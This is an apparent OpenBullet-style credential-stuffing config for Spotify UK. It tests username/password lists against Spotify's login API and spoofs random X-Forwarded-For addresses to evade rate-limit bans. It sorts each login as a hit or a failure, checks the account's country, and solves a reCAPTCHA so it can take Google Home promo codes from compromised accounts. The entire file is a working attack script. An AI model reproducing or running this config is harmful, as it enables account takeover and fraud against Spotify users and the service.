[SETTINGS]
{
  "Name": "Spotify UK - GoogleHome",
  "SuggestedBots": 1,
  "LastModified": "2019-04-02T21:34:44.041328+01:00",
  "AdditionalInfo": "",
  "Author": "Shycrackzz",
  "Version": "1.0.0",
  "IgnoreResponseErrors": false,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "None",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#ip1 FUNCTION RandomNum 1 255 -> VAR "ip1" 
#ip2 FUNCTION RandomNum 0 255 -> VAR "ip2" 
#ip3 FUNCTION RandomNum 0 255 -> VAR "ip3" 
#ip4 FUNCTION RandomNum 0 255 -> VAR "ip4" 
#Login REQUEST GET "https://accounts.spotify.com/en/login?continue=https:%2F%2Fwww.spotify.com%2Fus%2Faccount%2Foverview%2" 
  
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "X-Forwarded-For: <ip1>.<ip2>.<ip3>.<ip4>" 
KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Ban OR 
    KEY "<RESPONSECODE>" Contains "429" 
  KEYCHAIN Retry OR 
    KEY "<RESPONSECODE>" Contains "503" 
#csrf PARSE "<COOKIES(csrf_token)>" LR "" "" -> VAR "csrf" 
#Login REQUEST POST "https://accounts.spotify.com/api/login" 
  CONTENT "remember=true&username=<USER>&password=<PASS>&csrf_token=<csrf>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  COOKIE "__bon: MHwwfC0xNDAxNTMwNDkzfC01ODg2NDI4MDcwNnwxfDF8MXwx" 
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "X-Forwarded-For: <ip1>.<ip2>.<ip3>.<ip4>" 
KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "errorInvalidCredentials" 
  KEYCHAIN Ban OR 
    KEY "<RESPONSECODE>" Contains "429" 
  KEYCHAIN Success OR 
    KEY "displayName" 
  KEYCHAIN Retry OR 
    KEY "server_error" 
    KEY "<RESPONSECODE>" Contains "503" 
REQUEST GET "https://www.spotify.com/uk/account/overview/" 
  
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "X-Forwarded-For: <ip1>.<ip2>.<ip3>.<ip4>" 
KEYCHECK 
  KEYCHAIN Success OR 
    KEY "'userCountry': 'gb'" 
    KEY "'userCountry': 'fr'" 
#Get_code REQUEST GET "https://www.spotify.com/uk/googlehome/redeem/" 
  
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "X-Forwarded-For: <ip1>.<ip2>.<ip3>.<ip4>" 
KEYCHECK 
  KEYCHAIN Custom "FREE" OR 
    KEY "It looks like you've not registered your interest for this offer yet." 
    KEY "We're sorry but you're not able to redeem at this moment." 
RECAPTCHA "https://www.spotify.com/uk/googlehome/redeem/" "6LczFHwUAAAAAGySuXqlZLM1vhP4pqDd9O8cFfwc" -> VAR "Captcha" 
REQUEST POST "https://www.spotify.com/googlehome/redeem/getcode/" 
  CONTENT "g-recaptcha-response=<Captcha>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
KEYCHECK 
  KEYCHAIN Success OR 
    KEY "https://store.google.com" 
  KEYCHAIN Retry OR 
    KEY "<SOURCE>" DoesNotContain "https://store.google.com" 
PARSE "<SOURCE>" LR "" "" -> CAP "Code " 
